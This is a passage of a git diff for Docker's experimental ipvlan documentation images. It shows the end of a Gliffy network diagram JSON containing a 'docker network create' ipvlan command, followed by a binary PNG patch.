","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":14.0,"y":114.19999694824219,"rotation":0.0,"id":142,"width":78.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":235.5,"rotation":0.0,"id":184,"width":196.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

docker network create -d ipvlan \\

    --subnet=192.168.1.0/24 \\

    --gateway=192.168.1.1 \\

    -o parent=eth0 pub_net

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":45}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#999999","strokeWidth":6,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457584497063,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png new file mode 100644 index 0000000000000000000000000000000000000000..e489a446ddd255ce9360445f0f895acad31ae214 GIT binary patch literal 20145 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 